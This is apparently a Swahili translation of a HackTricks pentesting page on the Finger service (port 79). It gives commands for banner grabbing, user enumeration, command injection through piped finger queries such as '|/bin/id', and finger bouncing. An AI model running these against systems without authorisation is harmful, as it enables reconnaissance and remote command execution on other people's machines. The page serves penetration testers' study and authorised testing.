hacktricks/network-services-pentesting/pentesting-finger.md
2024-02-11 02:13:58 +00:00

79 lines
3.9 KiB
Markdown

# 79 - Kupima Kidole
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## **Maelezo Muhimu**
Programu/Huduma ya **Kidole** hutumiwa kupata maelezo kuhusu watumiaji wa kompyuta. Kawaida, maelezo yanayotolewa ni pamoja na **jina la kuingia la mtumiaji, jina kamili**, na, katika baadhi ya kesi, maelezo ya ziada. Maelezo haya ya ziada yanaweza kujumuisha eneo la ofisi na nambari ya simu (ikiwa inapatikana), wakati mtumiaji alijiunga, kipindi cha kutokuwa na shughuli (muda wa kutokuwa na shughuli), wakati wa mwisho mtumiaji alisoma barua pepe, na maudhui ya faili za mpango na mradi wa mtumiaji.
**Bandari ya chaguo-msingi:** 79
```
PORT STATE SERVICE
79/tcp open finger
```
## **Uchambuzi**
### **Kukamata Bango/Unganisho Msingi**
```bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
```
### **Uthibitishaji wa Watumiaji**
```bash
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
```
Badala yake, unaweza kutumia **finger-user-enum** kutoka [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), baadhi ya mifano:
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
#### **Nmap inatekeleza script kwa kutumia script za msingi**
### Metasploit hutumia mbinu zaidi kuliko Nmap
```
use auxiliary/scanner/finger/finger_users
```
### Shodan
* `port:79 USER`
## Utekelezaji wa Amri
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
## Kupiga Kidole
[Tumia mfumo kama kituo cha kupiga kidole](https://securiteam.com/exploits/2BUQ2RFQ0I/)
```
finger user@host@victim
finger @internal@external
```
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>